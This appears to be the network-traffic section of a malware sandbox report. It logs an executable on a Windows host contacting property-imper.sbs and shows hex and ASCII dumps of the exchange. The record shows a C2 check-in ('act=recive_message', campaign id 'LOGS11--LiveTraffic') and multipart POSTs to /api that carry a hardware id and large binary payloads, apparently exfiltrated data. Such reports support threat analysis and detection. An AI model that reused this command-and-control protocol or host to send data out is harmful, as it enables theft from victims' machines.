                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 53
                                                                              Host: property-imper.sbs
                                                                              2024-11-24 13:56:20 UTC | 53 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
                                                                              Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
                                                                              2024-11-24 13:56:21 UTC | 1013 | IN | HTTP/1.1 200 OK
                                                                              Date: Sun, 24 Nov 2024 13:56:21 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=lrm8v77n9ufsk5m2ss2boi7ft1; expires=Thu, 20-Mar-2025 07:43:00 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              cf-cache-status: DYNAMIC
                                                                              vary: accept-encoding
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MaBLZDGF6kK1OUxiybanBguvk1lsltaDgRGMUhzN%2FciHCb8Ty4rm5YkAL0RI7TXqgJA74msBdHhQdzFGiU8O4g%2FsVY2szwGk7GDFvwHhEkM6Tkc9ScLcxT3jqI2YIsh9x%2FWgGoY%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8e79e6e03dfc421d-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1728&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=955&delivery_rate=1638608&cwnd=190&unsent_bytes=0&cid=6219a4baf237aeda&ts=712&x=0"
                                                                              2024-11-24 13:56:21 UTC356INData Raw: 63 63 37 0d 0a 69 55 59 35 6c 66 35 55 54 6e 46 34 71 4c 49 6f 58 33 57 32 72 50 77 70 79 48 6e 30 70 4d 73 68 52 4f 63 75 33 6c 77 52 79 48 58 79 5a 45 2b 33 78 47 42 69 55 77 76 4e 6b 42 49 72 42 38 50 4a 30 41 75 70 48 64 61 65 72 55 41 6f 6c 45 76 79 66 6d 65 6c 56 37 4d 67 57 50 6d 4e 4d 57 4a 54 48 64 43 51 45 67 51 4f 6c 4d 6d 53 43 2f 4a 62 6b 63 36 70 51 43 69 46 54 37 55 7a 59 61 51 57 34 53 70 65 2f 5a 73 33 4b 68 41 55 78 64 64 4e 4f 68 54 63 77 70 56 45 6f 42 54 57 69 4f 6c 45 50 73 55 55 2f 42 46 30 76 42 54 45 4a 30 72 2b 33 43 6c 69 43 6c 72 4e 33 41 70 6c 56 39 66 4a 6e 6b 57 75 48 5a 2f 4d 6f 30 6b 67 68 45 71 30 4c 48 69 75 48 65 45 6b 58 66 79 52 50 6a 34 64 48 73 4c 63 53 7a 41 55 6c 49 44 65 54 4c 4a 62 7a 6f 62 36 63 53 57 55 58 61
                                                                              Data Ascii: cc7iUY5lf5UTnF4qLIoX3W2rPwpyHn0pMshROcu3lwRyHXyZE+3xGBiUwvNkBIrB8PJ0AupHdaerUAolEvyfmelV7MgWPmNMWJTHdCQEgQOlMmSC/Jbkc6pQCiFT7UzYaQW4Spe/Zs3KhAUxddNOhTcwpVEoBTWiOlEPsUU/BF0vBTEJ0r+3CliClrN3AplV9fJnkWuHZ/Mo0kghEq0LHiuHeEkXfyRPj4dHsLcSzAUlIDeTLJbzob6cSWUXa
                                                                              2024-11-24 13:56:21 UTC1369INData Raw: 42 45 73 48 62 54 79 38 63 33 63 4f 54 53 36 63 52 6d 63 57 70 52 43 79 50 51 37 59 36 66 71 63 52 36 79 51 62 75 64 77 78 4e 46 4e 43 69 76 4e 50 4c 52 44 59 32 4e 78 78 36 67 54 59 33 2b 6c 45 4b 73 55 55 2f 44 5a 32 71 52 54 67 4b 31 6a 2f 6c 79 51 73 41 52 7a 48 31 56 67 37 45 74 72 45 6e 56 6d 67 46 5a 44 46 6f 45 67 76 67 45 75 34 66 6a 33 71 45 50 4e 6b 41 37 65 39 4f 79 63 66 45 4e 33 51 43 69 4a 5a 7a 59 36 5a 52 2b 70 44 31 73 4b 6f 52 79 65 42 51 72 49 36 66 36 77 5a 35 69 74 64 2f 5a 77 78 4a 68 73 53 79 39 31 42 4d 68 66 52 77 35 70 4e 70 68 71 54 68 75 63 44 49 5a 30 4d 35 48 35 64 72 52 54 35 5a 6d 37 30 6b 6a 67 72 42 56 72 56 6e 6c 4e 39 45 4e 69 4f 78 67 75 6b 48 70 6e 55 71 46 45 6a 69 31 36 77 4f 33 57 6e 46 4f 55 6b 58 76 43 52 4f 43
                                                                              Data Ascii: BEsHbTy8c3cOTS6cRmcWpRCyPQ7Y6fqcR6yQbudwxNFNCivNPLRDY2Nxx6gTY3+lEKsUU/DZ2qRTgK1j/lyQsARzH1Vg7EtrEnVmgFZDFoEgvgEu4fj3qEPNkA7e9OycfEN3QCiJZzY6ZR+pD1sKoRyeBQrI6f6wZ5itd/ZwxJhsSy91BMhfRw5pNphqThucDIZ0M5H5drRT5Zm70kjgrBVrVnlN9ENiOxgukHpnUqFEji16wO3WnFOUkXvCROC
                                                                              2024-11-24 13:56:21 UTC1369INData Raw: 6e 6c 4e 39 45 4e 69 4f 78 67 75 6d 45 70 62 4e 6f 30 63 6d 67 6b 47 35 50 58 53 70 47 75 77 75 56 66 43 59 4f 69 55 65 48 4d 72 58 54 6a 67 46 30 63 65 53 52 2b 70 56 31 73 47 78 41 33 37 46 59 37 73 6f 63 49 55 55 2b 69 30 62 36 4e 49 76 62 42 51 57 69 6f 67 4b 4f 68 4c 63 78 5a 68 44 71 67 6d 54 79 4b 4a 43 4c 49 4e 4e 73 54 4a 31 71 68 62 72 49 6c 66 33 6d 7a 45 2b 41 52 2f 4d 77 6b 42 39 57 5a 54 4a 68 67 76 79 57 36 44 57 76 6c 49 77 78 33 6d 2f 4d 48 32 74 41 61 73 37 46 65 37 63 4d 53 42 54 51 6f 72 62 53 6a 45 51 33 4d 69 61 51 36 55 55 6e 39 53 6f 54 79 69 58 53 37 77 33 66 61 55 62 34 69 6c 63 2b 70 63 38 49 52 63 64 79 35 41 45 66 52 44 4d 6a 73 59 4c 6e 41 75 62 79 6f 64 49 4b 6f 77 4d 6f 33 42 71 36 68 44 6e 5a 41 4f 33 6d 44 6f 6b 47 52 58
                                                                              Data Ascii: nlN9ENiOxgumEpbNo0cmgkG5PXSpGuwuVfCYOiUeHMrXTjgF0ceSR+pV1sGxA37FY7socIUU+i0b6NIvbBQWiogKOhLcxZhDqgmTyKJCLINNsTJ1qhbrIlf3mzE+AR/MwkB9WZTJhgvyW6DWvlIwx3m/MH2tAas7Fe7cMSBTQorbSjEQ3MiaQ6UUn9SoTyiXS7w3faUb4ilc+pc8IRcdy5AEfRDMjsYLnAubyodIKowMo3Bq6hDnZAO3mDokGRX
                                                                              2024-11-24 13:56:21 UTC184INData Raw: 52 44 51 79 4a 45 4c 35 46 75 52 33 75 6b 62 5a 71 70 72 69 58 78 53 6b 46 66 30 61 6b 4b 33 6d 7a 70 73 53 31 72 47 30 30 59 31 47 4e 4c 48 6b 6b 47 6a 45 4a 72 4e 72 55 38 76 67 45 71 39 4f 33 61 72 45 2b 63 75 58 66 53 66 4f 53 4d 63 45 6f 71 65 43 6a 6f 50 6c 4a 62 65 62 72 30 51 6d 4d 44 70 58 47 69 63 44 4c 73 79 4d 2f 4a 58 35 79 31 64 38 5a 6b 36 4c 52 55 53 7a 39 68 4f 50 42 48 53 7a 5a 46 50 72 78 71 5a 77 71 56 4e 4c 49 52 4e 73 44 56 38 6f 52 4b 72 61 68 76 77 68 48 5a 30 55 79 76 4a 78 6c 30 74 47 35 54 52 30 46 4c 71 48 4a 71 0d 0a
                                                                              Data Ascii: RDQyJEL5FuR3ukbZqpriXxSkFf0akK3mzpsS1rG00Y1GNLHkkGjEJrNrU8vgEq9O3arE+cuXfSfOSMcEoqeCjoPlJbebr0QmMDpXGicDLsyM/JX5y1d8Zk6LRUSz9hOPBHSzZFPrxqZwqVNLIRNsDV8oRKrahvwhHZ0UyvJxl0tG5TR0FLqHJq
                                                                              2024-11-24 13:56:21 UTC1369INData Raw: 33 37 61 35 0d 0a 47 38 51 4d 6e 6c 30 61 32 4d 48 61 6c 45 75 67 72 58 50 71 61 4f 69 59 61 45 73 7a 66 51 79 38 55 32 4d 43 5a 52 61 59 56 6d 38 79 71 54 6d 62 4c 44 4c 73 6d 4d 2f 4a 58 78 79 4e 57 32 5a 63 36 4b 31 4d 46 68 4d 6b 4b 4f 68 75 55 6c 74 35 48 6f 42 65 66 78 71 42 47 4c 6f 35 46 75 54 39 34 72 78 54 74 4b 56 54 2b 6a 6a 77 76 48 52 6e 47 33 45 77 38 46 4d 62 47 6c 77 76 6b 57 35 48 65 36 52 74 6d 70 45 4b 78 4b 6e 53 36 56 2f 52 71 51 72 65 62 4f 6d 78 4c 57 73 6e 52 52 54 34 57 32 63 69 58 51 36 6f 64 6b 38 6d 6b 54 53 47 43 54 4c 45 77 66 4b 77 66 35 69 68 51 2b 5a 55 77 4c 42 49 51 69 70 34 4b 4f 67 2b 55 6c 74 35 37 71 52 75 57 33 65 6c 63 61 4a 77 4d 75 7a 49 7a 38 6c 66 35 4c 6c 4c 33 6e 7a 6b 72 46 78 48 47 31 55 38 79 46 4e 33 4c
                                                                              Data Ascii: 37a5G8QMnl0a2MHalEugrXPqaOiYaEszfQy8U2MCZRaYVm8yqTmbLDLsmM/JXxyNW2Zc6K1MFhMkKOhuUlt5HoBefxqBGLo5FuT94rxTtKVT+jjwvHRnG3Ew8FMbGlwvkW5He6RtmpEKxKnS6V/RqQrebOmxLWsnRRT4W2ciXQ6odk8mkTSGCTLEwfKwf5ihQ+ZUwLBIQip4KOg+Ult57qRuW3elcaJwMuzIz8lf5LlL3nzkrFxHG1U8yFN3L
                                                                              2024-11-24 13:56:21 UTC1369INData Raw: 75 52 79 75 6b 62 5a 6f 52 41 73 7a 31 38 71 52 54 71 4c 6b 6e 6c 6b 44 38 6b 46 68 62 42 33 6b 77 76 45 64 76 48 6e 55 69 6a 48 4a 37 4b 6f 30 41 68 78 51 4c 38 4f 57 76 71 54 36 73 48 54 4f 65 52 64 6a 4e 64 41 34 72 58 52 6e 31 50 6c 4d 61 54 51 36 41 66 6b 63 75 75 52 53 2b 58 52 62 6b 77 63 36 34 63 35 43 4a 66 39 4a 77 6b 4b 68 63 53 79 64 31 48 4d 78 54 51 6a 74 41 4c 72 51 50 57 6e 75 6c 78 4b 34 74 58 73 7a 6c 69 6f 46 66 30 61 6b 4b 33 6d 7a 70 73 53 31 72 4f 33 6c 67 32 46 74 2f 46 6b 45 79 6c 48 70 7a 47 70 6b 63 6c 69 30 65 39 50 58 75 6e 47 75 55 75 55 76 36 62 4f 69 67 55 57 6f 53 51 54 53 56 58 6a 49 36 31 61 6f 63 33 6b 64 7a 70 58 47 69 63 44 4c 73 79 4d 2f 4a 58 35 79 31 58 2f 5a 63 78 4a 68 30 54 78 4e 74 59 4c 78 54 51 7a 5a 64 49 72
                                                                              Data Ascii: uRyukbZoRAsz18qRTqLknlkD8kFhbB3kwvEdvHnUijHJ7Ko0AhxQL8OWvqT6sHTOeRdjNdA4rXRn1PlMaTQ6AfkcuuRS+XRbkwc64c5CJf9JwkKhcSyd1HMxTQjtALrQPWnulxK4tXszlioFf0akK3mzpsS1rO3lg2Ft/FkEylHpzGpkcli0e9PXunGuUuUv6bOigUWoSQTSVXjI61aoc3kdzpXGicDLsyM/JX5y1X/ZcxJh0TxNtYLxTQzZdIr
                                                                              2024-11-24 13:56:21 UTC1369INData Raw: 71 52 32 62 4c 44 4c 73 6d 4d 2f 4a 58 78 69 68 63 33 70 73 74 62 41 78 55 30 35 42 4e 4d 56 65 4d 6a 70 39 41 6f 42 53 62 78 61 39 41 4c 59 42 47 76 54 6c 37 70 77 58 6f 4b 31 54 7a 6e 44 6b 71 46 52 76 46 31 6b 30 30 46 74 7a 4a 33 67 58 71 48 49 36 47 38 51 4d 49 67 6b 2b 34 66 6d 7a 6b 44 71 73 6a 56 37 66 45 64 69 77 5a 45 4d 44 65 53 6a 6f 46 30 73 65 65 53 4c 67 59 6b 4d 36 76 54 79 71 49 52 4c 55 2b 64 71 45 61 34 43 6c 64 39 35 63 33 62 46 31 61 7a 63 67 4b 5a 56 66 6c 77 35 42 50 70 42 69 47 77 65 6c 63 61 4a 77 4d 75 7a 49 7a 38 6c 66 6b 4c 55 6e 77 6d 54 34 6c 45 78 54 44 32 55 30 35 46 4e 58 4b 6b 6b 53 6a 47 4a 37 48 6f 55 77 6c 68 55 65 30 4e 48 4b 6b 45 71 74 71 47 2f 43 45 64 6e 52 54 4e 63 6e 56 51 54 78 56 38 38 69 5a 52 2b 6f 45 32 4e
                                                                              Data Ascii: qR2bLDLsmM/JXxihc3pstbAxU05BNMVeMjp9AoBSbxa9ALYBGvTl7pwXoK1TznDkqFRvF1k00FtzJ3gXqHI6G8QMIgk+4fmzkDqsjV7fEdiwZEMDeSjoF0seeSLgYkM6vTyqIRLU+dqEa4Cld95c3bF1azcgKZVflw5BPpBiGwelcaJwMuzIz8lfkLUnwmT4lExTD2U05FNXKkkSjGJ7HoUwlhUe0NHKkEqtqG/CEdnRTNcnVQTxV88iZR+oE2N
                                                                              2024-11-24 13:56:21 UTC1369INData Raw: 68 6b 4b 79 4f 57 57 37 57 73 77 2b 56 76 47 4c 4a 32 78 64 57 73 79 51 45 6d 31 5a 6c 4d 71 50 43 2f 4a 4c 78 4a 33 38 45 48 48 56 48 71 4e 77 61 75 6f 42 71 33 77 4a 75 64 77 6b 62 45 74 61 6a 64 4e 59 4c 78 48 58 32 4a 30 4d 6c 43 57 34 77 61 39 47 49 5a 55 4f 6b 6a 56 6e 72 56 65 6c 5a 46 53 33 78 41 39 73 57 31 72 31 6e 67 6f 6c 56 34 79 4f 71 30 69 6b 46 5a 48 51 75 41 34 49 67 6b 71 35 4f 57 50 6f 4f 65 41 77 58 4c 66 53 64 69 70 54 51 70 71 65 43 6a 6b 47 6c 4a 62 4f 47 66 46 4f 78 5a 48 35 45 54 6e 4c 56 66 77 6f 4d 2f 4a 46 70 57 52 4a 74 38 52 32 61 78 41 49 32 4e 5a 4a 4b 78 53 54 38 4b 42 49 76 42 61 5a 7a 61 68 39 47 4b 74 42 76 54 31 39 36 43 62 39 4b 55 76 30 6d 54 45 53 4c 52 54 4e 78 45 30 7a 45 64 53 4f 30 41 75 6c 57 38 37 2f 36 51 74
                                                                              Data Ascii: hkKyOWW7Wsw+VvGLJ2xdWsyQEm1ZlMqPC/JLxJ38EHHVHqNwauoBq3wJudwkbEtajdNYLxHX2J0MlCW4wa9GIZUOkjVnrVelZFS3xA9sW1r1ngolV4yOq0ikFZHQuA4Igkq5OWPoOeAwXLfSdipTQpqeCjkGlJbOGfFOxZH5ETnLVfwoM/JFpWRJt8R2axAI2NZJKxST8KBIvBaZzah9GKtBvT196Cb9KUv0mTESLRTNxE0zEdSO0AulW87/6Qt
                                                                              2024-11-24 13:56:21 UTC1369INData Raw: 47 34 68 38 55 4b 34 63 77 75 6c 67 33 67 31 55 77 79 4b 69 42 68 7a 56 38 61 4f 78 67 76 74 47 49 54 55 72 30 41 77 68 67 75 43 41 46 53 6b 45 4f 6f 79 53 2f 71 51 46 79 38 43 45 50 54 75 58 7a 34 5a 32 73 6d 49 57 75 70 56 31 73 6e 70 47 78 2f 46 42 50 77 42 50 65 6f 50 71 33 77 62 77 70 38 34 49 68 51 4d 32 35 31 74 4d 78 44 56 32 49 35 47 70 6a 71 56 31 36 4d 44 61 4d 56 4b 2f 47 59 68 35 46 66 76 4e 52 75 76 7a 47 52 33 52 6b 6d 64 67 42 67 69 57 63 32 4f 69 41 76 79 53 64 69 47 75 77 4e 2b 78 51 75 2f 4c 47 47 73 46 50 30 6e 48 4d 6d 69 45 7a 73 51 43 73 7a 54 64 41 4d 38 32 4d 69 5a 55 61 30 64 73 4f 62 70 44 57 61 4b 44 4f 51 48 4d 2b 4a 58 31 47 6f 62 37 39 78 75 62 43 59 5a 78 4e 35 4e 4b 77 61 5a 36 34 6c 49 75 68 32 56 68 75 63 44 49 4d 55 55
                                                                              Data Ascii: G4h8UK4cwulg3g1UwyKiBhzV8aOxgvtGITUr0AwhguCAFSkEOoyS/qQFy8CEPTuXz4Z2smIWupV1snpGx/FBPwBPeoPq3wbwp84IhQM251tMxDV2I5GpjqV16MDaMVK/GYh5FfvNRuvzGR3RkmdgBgiWc2OiAvySdiGuwN+xQu/LGGsFP0nHMmiEzsQCszTdAM82MiZUa0dsObpDWaKDOQHM+JX1Gob79xubCYZxN5NKwaZ64lIuh2VhucDIMUU


                                                                              Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                              2          | 192.168.2.7 | 49704       | 172.67.162.84  | 443              | 7472 | C:\Users\user\Desktop\file.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-11-24 13:56:23 UTC | 280 | OUT | POST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: multipart/form-data; boundary=PXS8L39KKN0OTL
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 12826
                                                                              Host: property-imper.sbs
                                                                              2024-11-24 13:56:23 UTC12826OUTData Raw: 2d 2d 50 58 53 38 4c 33 39 4b 4b 4e 30 4f 54 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 32 32 35 31 31 39 35 46 46 45 34 43 43 34 38 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 50 58 53 38 4c 33 39 4b 4b 4e 30 4f 54 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 50 58 53 38 4c 33 39 4b 4b 4e 30 4f 54 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 50 58
                                                                              Data Ascii: --PXS8L39KKN0OTLContent-Disposition: form-data; name="hwid"12251195FFE4CC48D7CBBD6DF28D3732--PXS8L39KKN0OTLContent-Disposition: form-data; name="pid"2--PXS8L39KKN0OTLContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--PX
                                                                              2024-11-24 13:56:24 UTC | 1016 | IN | HTTP/1.1 200 OK
                                                                              Date: Sun, 24 Nov 2024 13:56:24 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=k4tj7dnjq8nnbmecl06ipfsvmu; expires=Thu, 20-Mar-2025 07:43:02 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              cf-cache-status: DYNAMIC
                                                                              vary: accept-encoding
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oRty92QtC0oTL%2BXNXSiNCBlTvEs%2FTuCNkHg7o6oyovjzAJoDnP5V32cXhOxgXheK5wCm27jKfCpDgF37xpFcVeWSHSSsKi7arCkIoxC1vt2DqEzWUpBlTrbL6kzzzCOq0VEc9QQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8e79e6ee1fbf42a9-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2180&sent=10&recv=18&lost=0&retrans=0&sent_bytes=2844&recv_bytes=13764&delivery_rate=1365762&cwnd=183&unsent_bytes=0&cid=ea65213a0ab27e3d&ts=1008&x=0"
                                                                              2024-11-24 13:56:24 UTC | 19 | IN | Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                              Data Ascii: eok 8.46.123.75
                                                                              2024-11-24 13:56:24 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                              3          | 192.168.2.7 | 49705       | 172.67.162.84  | 443              | 7472 | C:\Users\user\Desktop\file.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-11-24 13:56:25 UTC | 278 | OUT | POST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: multipart/form-data; boundary=XOWQ8R70FVEH
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 15046
                                                                              Host: property-imper.sbs
                                                                              2024-11-24 13:56:25 UTC15046OUTData Raw: 2d 2d 58 4f 57 51 38 52 37 30 46 56 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 32 32 35 31 31 39 35 46 46 45 34 43 43 34 38 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 58 4f 57 51 38 52 37 30 46 56 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 58 4f 57 51 38 52 37 30 46 56 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 58 4f 57 51 38 52 37 30
                                                                              Data Ascii: --XOWQ8R70FVEHContent-Disposition: form-data; name="hwid"12251195FFE4CC48D7CBBD6DF28D3732--XOWQ8R70FVEHContent-Disposition: form-data; name="pid"2--XOWQ8R70FVEHContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--XOWQ8R70
                                                                              2024-11-24 13:56:26 UTC | 1019 | IN | HTTP/1.1 200 OK
                                                                              Date: Sun, 24 Nov 2024 13:56:26 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=5qe47p708996b9smq35r30jdlr; expires=Thu, 20-Mar-2025 07:43:05 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              cf-cache-status: DYNAMIC
                                                                              vary: accept-encoding
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gPggaSe0mCOBXi4ZeAKE1RlP9YgIrk9sKmHkdfbgzbpI7MbfB92EZ87fXSFqsf8xuB1wX%2Fqj7Mv5%2B8lM1Ostpeo2HEXmkHYDjgLMKZQ7D%2FrXXJBm9ZeNyJn%2FGYVgFaDaSCT7fwA%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8e79e6fcda25728a-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1808&sent=11&recv=19&lost=0&retrans=0&sent_bytes=2846&recv_bytes=15982&delivery_rate=1527995&cwnd=224&unsent_bytes=0&cid=bf8b179ea245e876&ts=905&x=0"
                                                                              2024-11-24 13:56:26 UTC | 19 | IN | Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                              Data Ascii: eok 8.46.123.75
                                                                              2024-11-24 13:56:26 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                              4          | 192.168.2.7 | 49716       | 172.67.162.84  | 443              | 7472 | C:\Users\user\Desktop\file.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-11-24 13:56:28 UTC | 277 | OUT | POST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: multipart/form-data; boundary=0K8HMKZ6QXJ
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 20365
                                                                              Host: property-imper.sbs
                                                                              2024-11-24 13:56:28 UTC15331OUTData Raw: 2d 2d 30 4b 38 48 4d 4b 5a 36 51 58 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 32 32 35 31 31 39 35 46 46 45 34 43 43 34 38 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 30 4b 38 48 4d 4b 5a 36 51 58 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 30 4b 38 48 4d 4b 5a 36 51 58 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 30 4b 38 48 4d 4b 5a 36 51 58 4a
                                                                              Data Ascii: --0K8HMKZ6QXJContent-Disposition: form-data; name="hwid"12251195FFE4CC48D7CBBD6DF28D3732--0K8HMKZ6QXJContent-Disposition: form-data; name="pid"3--0K8HMKZ6QXJContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--0K8HMKZ6QXJ
                                                                              2024-11-24 13:56:28 UTC5034OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 36 d7 17 05 4b db 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e6 fa a3 60 69 db 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 db 5c 5f 14 2c 6d fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9b eb 8f 82 a5 6d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 73 7d 51 b0 b4 ed a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 6d ae 2f f8 f5 58 32 78 29 1e bc 14 fc db e0 ab e6 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                              Data Ascii: 6K~`iO\_,mi`m?ls}Qm/X2x)
                                                                              2024-11-24 13:56:29 UTC | 1021 | IN | HTTP/1.1 200 OK
                                                                              Date: Sun, 24 Nov 2024 13:56:29 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=05gqeaec8ejod1c6f8sn604dt1; expires=Thu, 20-Mar-2025 07:43:07 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              cf-cache-status: DYNAMIC
                                                                              vary: accept-encoding
